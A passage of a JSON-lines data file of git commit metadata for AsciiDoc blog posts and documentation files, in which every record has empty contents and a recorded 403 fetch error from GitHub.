2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a7e4c425e04eace05c6b0c509f56db248b82672","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c56d469d023599e15fcdbe16b938c3c6ed6caa4","subject":"Update 2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","message":"Update 2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","new_file":"_posts\/2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4825a0877e89528c297538f6c5c3ad7d69f39de","subject":"Update 
2015-02-12-hello.adoc","message":"Update 2015-02-12-hello.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-hello.adoc","new_file":"_posts\/2015-02-12-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875416332b799741689a3b420b6659c8a465b680","subject":"Delete 2016-02-05-Hello.adoc","message":"Delete 2016-02-05-Hello.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Hello.adoc","new_file":"_posts\/2016-02-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0d28980497baf3b7c303584652cf8ae0736f9d3","subject":"Delete the file at '_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc'","message":"Delete the file at '_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc'","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"411fe6d3085fe3ea2de328cc12179c4c6869d1c9","subject":"y2b create post The Ultimate Game Capture Device? (Blackmagic Design Intensity Shuttle Unboxing \\u0026 Overview)","message":"y2b create post The Ultimate Game Capture Device? 
(Blackmagic Design Intensity Shuttle Unboxing \\u0026 Overview)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-13-The-Ultimate-Game-Capture-Device-Blackmagic-Design-Intensity-Shuttle-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-07-13-The-Ultimate-Game-Capture-Device-Blackmagic-Design-Intensity-Shuttle-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1bd68ce8ce51961e87bec6157ab7385478f5ae9","subject":"Update 2016-04-03-Letat-limite-borderline.adoc","message":"Update 2016-04-03-Letat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8186680f51015a6779254920055605391709953c","subject":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce12f875e7be3380956aacb0aecbe7a7dae0ef8d","subject":"Use absolute images dir only when generating html","message":"Use absolute images dir only when generating html\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/index.adoc","new_file":"src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad23f8b7c74cb584b15454864743957f7b98c654","subject":"examples readme","message":"examples readme\n","repos":"arun-gupta\/snoop,arun-gupta\/snoop,ivargrimstad\/snoop,arun-gupta\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop","old_file":"snoop-examples\/README.adoc","new_file":"snoop-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21204881439692b635d348788c4da3232a00144e","subject":"add a new test doc","message":"add a new test doc\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/simple.adoc","new_file":"data\/testdocs\/wellformed\/simple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590f2a851839845c5a30c42db38b3da050ea7862","subject":"[DOCS] Added 6.2.2 draft","message":"[DOCS] Added 6.2.2 draft\n\nOriginal commit: elastic\/x-pack-elasticsearch@41ed8719ebc13a9a84ead5dfa64a88e18ebcb769\n","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/release-notes\/6.2.2.asciidoc","new_file":"docs\/en\/release-notes\/6.2.2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e91c3198269b84ca0dbab2004729e5826b8c7436","subject":"Added RPC examples for add_stream method","message":"Added RPC examples for add_stream method\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae0287287ff741be2bb6525a6fa632bef7f95898","subject":"add get_utilization command","message":"add get_utilization command\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1660ff47bf679871ddb8d1af0a42933f1c6e4c4","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab782a637dbba4559bacb0f3d88e38ed5f0cc530","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3f91b1ab9d4585d0aaacae1dddcad46d7ebbad","subject":"Updating the README.adoc","message":"Updating the 
README.adoc\n","repos":"lambdamatic\/lambdamatic-project,xcoulon\/lambdamatic-project,xcoulon\/lambdamatic-project,lambdamatic\/lambdamatic-project","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xcoulon\/lambdamatic-project.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ee4bc9573230c3e6cf06b03f71ec77114b494028","subject":"Draft of deploying the local provisioner","message":"Draft of deploying the local provisioner","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/deploying-local-provisioner.adoc","new_file":"modules\/deploying-local-provisioner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2a497d75167aecf64e2093f5a8b302eeb86e796","subject":"Update 2015-02-13-HubPress-love-Instagram.adoc","message":"Update 2015-02-13-HubPress-love-Instagram.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-02-13-HubPress-love-Instagram.adoc","new_file":"_posts\/2015-02-13-HubPress-love-Instagram.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4096701c480bb3074f0ebc004b04a3c962d0c76f","subject":"first draft chapter 3","message":"first draft chapter 3\n","repos":"BenFradet\/spark-ml","old_file":"manuscript\/SparkMLinA_CH03.adoc","new_file":"manuscript\/SparkMLinA_CH03.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenFradet\/spark-ml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b22e833a6487081fc7c641b150e253fee852df0","subject":"Update 2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","message":"Update 2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","new_file":"_posts\/2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676a3829959cdf833fc9e4413a07c4ef4dfed741","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 
2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18278c25d39b2b5a713334080485971c56f9c26d","subject":"Update 2017-01-21-Intersection.adoc","message":"Update 2017-01-21-Intersection.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Intersection.adoc","new_file":"_posts\/2017-01-21-Intersection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdb5cf08ad5a258a92f3f9de27a88becaf489898","subject":"BXMSDOC-2131: Copied WhatIsAPlanningProblem.adoc file to optaplanner-what-is-a-planning-problem","message":"BXMSDOC-2131: Copied WhatIsAPlanningProblem.adoc file to optaplanner-what-is-a-planning-problem\n","repos":"jomarko\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs","old_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-planning-problem-con.adoc","new_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-planning-problem-con.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01aa0aedd5dbbe74f7bda645ac6d12574e091c07","subject":"COMPILING: Update the guide considering lack of symlinks","message":"COMPILING: Update the guide considering lack of symlinks\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b0c0dab3aed53394b011ee9bae5a5d0b332f774c","subject":"y2b create post Fling Joystick For iPad Unboxing \\u0026 Overview","message":"y2b create post Fling Joystick For iPad Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-26-Fling-Joystick-For-iPad-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-26-Fling-Joystick-For-iPad-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89d39f9c8c1505bfb05672c25ed25b7d529c998","subject":"CL: Files needed to add a private key to ssh-agent","message":"CL: Files needed to add a private key to ssh-agent\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d81e58d82d312e7ab4eb6678814d7cd9bf6126c2","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90ee63f4975c15b8183aa6378e5bfb48a80ee681","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccc22be7d28cb9ffaf18fe5c746c338dc8229947","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1c7cc8f50c5afa07ec2678eca01adbc14c4fba","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2e347447d9a9e6ed05de9da0a168b60cce1d64","subject":"Add changes file.","message":"Add changes file.\n","repos":"funcool\/buddy-sign","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/buddy-sign.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f23679908eb404bb62649761821a92c93481a906","subject":"Update 2014-04-30-Coding-rules.adoc","message":"Update 2014-04-30-Coding-rules.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-30-Coding-rules.adoc","new_file":"_posts\/2014-04-30-Coding-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f740af7cdadedd8f19bed420578be18fa89d5ef0","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee0cb7716d5fad8641821956e757b037c3594c3b","subject":"arc42 with lower-case \"a\", added link to arc42.org","message":"arc42 with lower-case \"a\", added link to arc42.org","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5196fcae79d4272ef1bf0e8d2d90dde122699e21","subject":"Added more concept info","message":"Added more concept info\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dafde175f81c16043407be8b5d5e2d427fe2b64","subject":"Create errata.adoc","message":"Create errata.adoc","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/errata.adoc","new_file":"docs\/errata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a059c5f3c96adce5d3f28276475249e92b82f81","subject":"s\/\\’\/'\/g","message":"s\/\\’\/'\/g\n","repos":"OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cf5029a4ca39342df39ec656a4c6b0595753bd98","subject":"Update 2017-11-18-Oyku.adoc","message":"Update 2017-11-18-Oyku.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-18-Oyku.adoc","new_file":"_posts\/2017-11-18-Oyku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a997e1c0d9a24ee3f1de514d311227b9668ae746","subject":"Deleted 
_posts\/2016-10-27-Demo.adoc","message":"Deleted _posts\/2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0181d4351b469dbe899b8921d35a484406ae1052","subject":"Update 2019-03-16-Cirq.adoc","message":"Update 2019-03-16-Cirq.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-16-Cirq.adoc","new_file":"_posts\/2019-03-16-Cirq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1dcfcdedc7a3279d45b2f265a4c6c101754da78","subject":"Update 2006-08-01.adoc","message":"Update 2006-08-01.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"_posts\/2006-08-01.adoc","new_file":"_posts\/2006-08-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bed4b8bac2ee5e331d0d0bcff96e499d7b8de3d6","subject":"fix https:\/\/github.com\/docker\/labs\/issues\/242","message":"fix https:\/\/github.com\/docker\/labs\/issues\/242\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"608e539967ea6a539bc38ff940aa0db6a4eff36c","subject":"Add readme to carvel","message":"Add readme to carvel\n","repos":"jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow","old_file":"src\/carvel\/README.adoc","new_file":"src\/carvel\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jvalkeal\/spring-cloud-data.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c736e968a1879cf068d90e1fd2a61a4e86c67e10","subject":"Update 2015-11-05-Dive-into-Python-3.adoc","message":"Update 
2015-11-05-Dive-into-Python-3.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7351f922cf1b6f6d74a52e22b065d4333bda100","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08517a4ffe236f0bf0cfd9304b5a7678dca01b6b","subject":"Update 2017-05-28-Naming-Conventions.adoc","message":"Update 2017-05-28-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 